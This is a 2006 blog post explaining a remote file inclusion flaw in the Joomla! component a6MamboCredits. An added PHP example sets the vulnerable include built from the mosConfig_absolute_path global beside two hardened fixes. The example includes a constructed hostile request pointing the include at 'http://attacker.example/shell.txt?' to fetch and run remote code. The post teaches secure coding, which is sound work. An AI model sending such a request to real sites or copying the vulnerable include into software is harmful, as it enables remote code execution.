I got forwarded an email yesterday about a vulnerability in the Joomla! component “a6MamboCredits”. The vulnerability was due to three things.
- PHP's register_globals directive was turned on, so every request variable became a PHP global.
- Joomla! emulates register_globals even when the directive is off, copying request variables into global scope.
- The global variable “mosConfig_absolute_path” was used to include files, so a request could set it to an attacker-controlled path or URL before the component ran.
So the vulnerability was from code like the following:
require_once( $GLOBALS['mosConfig_absolute_path']. '/administrator/includes/pageNavigation.php' );
The solution, and better programming in general, is to use either:
$absolute_path = $mainframe->getCfg('absolute_path'); require_once( $absolute_path . '/administrator/includes/pageNavigation.php' );
define( 'ABSOLUTE_PATH', dirname(__FILE__) ); require_once( ABSOLUTE_PATH . '/administrator/includes/pageNavigation.php' );
Note that dirname(__FILE__) is the directory of the current file, so a component installed under components/ needs the relative path adjusted to reach the site root.
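The following is an added example, not code from the original post or from the a6MamboCredits component. It reproduces the three ingredients listed above (register_globals, Joomla!'s emulation of it, and an include built from the mosConfig_absolute_path global) and puts the vulnerable include beside the two hardened forms. It assumes Joomla! 1.0 conventions (the _VALID_MOS guard and a $mainframe object with getCfg()); the attacker host, the component path, and the minimal mosMainFrame stand-in are assumptions made so the file runs stand-alone.

```php
<?php
// Added example (not code from the original post or from the a6MamboCredits
// component). Reproduces the three ingredients the post lists and shows the
// vulnerable include beside two hardened forms. The attacker host, the
// component path and the MosMainFrameStandIn class are assumptions.

// Ingredient 2: Joomla! 1.0 copied request variables into global scope when
// PHP's own register_globals was off. Simplified stand-in for that behaviour:
function emulateRegisterGlobals(array $request)
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// Ingredients 1 and 3: the component file is requested directly, so index.php
// and configuration.php never ran, and $mosConfig_absolute_path is whatever the
// query string says. Constructed hostile request (assumed component path):
//   GET /components/com_a6mambocredits/a6mambocredits.php
//       ?mosConfig_absolute_path=http://attacker.example/shell.txt?
$hostileRequest = array(
    'mosConfig_absolute_path' => 'http://attacker.example/shell.txt?',
);
emulateRegisterGlobals($hostileRequest);

// VULNERABLE: the pattern the post describes. The resulting path is
// http://attacker.example/shell.txt?/administrator/includes/pageNavigation.php
// (the trailing "?" turns the appended path into a query string), which PHP
// would fetch and execute if allow_url_fopen (PHP 4/5.1) or allow_url_include
// (PHP >= 5.2) permits remote includes.
function vulnerableIncludePath()
{
    return $GLOBALS['mosConfig_absolute_path'] . '/administrator/includes/pageNavigation.php';
}
// require_once(vulnerableIncludePath());   // deliberately not executed here

// HARDENED, step 1: refuse direct access. Joomla! 1.0's index.php defines
// _VALID_MOS before loading any component, so this line kills the direct
// request above before any request-derived global is used. Left commented
// so this example runs stand-alone; uncomment it in a real component file.
// defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// HARDENED, step 2a: ask the framework for the path. In Joomla! 1.0 $mainframe
// is the mosMainFrame object created by index.php and getCfg() returns values
// from configuration.php. Minimal stand-in (assumption) so the example runs:
class MosMainFrameStandIn
{
    private $config;
    public function __construct(array $config) { $this->config = $config; }
    public function getCfg($name) { return isset($this->config[$name]) ? $this->config[$name] : null; }
}
$mainframe = new MosMainFrameStandIn(array('absolute_path' => '/var/www/joomla'));

function safeIncludePathFromConfig($mainframe)
{
    $absolutePath = $mainframe->getCfg('absolute_path');
    return $absolutePath . '/administrator/includes/pageNavigation.php';
}

// HARDENED, step 2b: derive the path from this file's own location. Note that
// dirname(__FILE__) is the directory of *this* file, so a component living in
// components/com_a6mambocredits/ must climb two levels to reach the site root.
function safeIncludePathFromFile()
{
    $siteRoot = dirname(dirname(dirname(__FILE__)));   // components/com_x/ -> site root
    return $siteRoot . '/administrator/includes/pageNavigation.php';
}

// Whatever the request said, the hardened forms ignore it:
echo "vulnerable:  " . vulnerableIncludePath() . "\n";
echo "from config: " . safeIncludePathFromConfig($mainframe) . "\n";
echo "from file:   " . safeIncludePathFromFile() . "\n";
```

Running this prints the attacker's URL as the vulnerable include path and two local paths for the hardened forms. In a real component the _VALID_MOS guard belongs on the first line, before any request data can reach an include, require, or file operation.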
Little programming practices like this make your components so much more secure. The vulnerabilities that keep popping up come from bad programming practices, and they give Joomla! a bad name. So let's all start programming wisely.
This entry was posted on Wednesday, August 23rd, 2006 at 10:59 am and is filed under Joomla, PHP.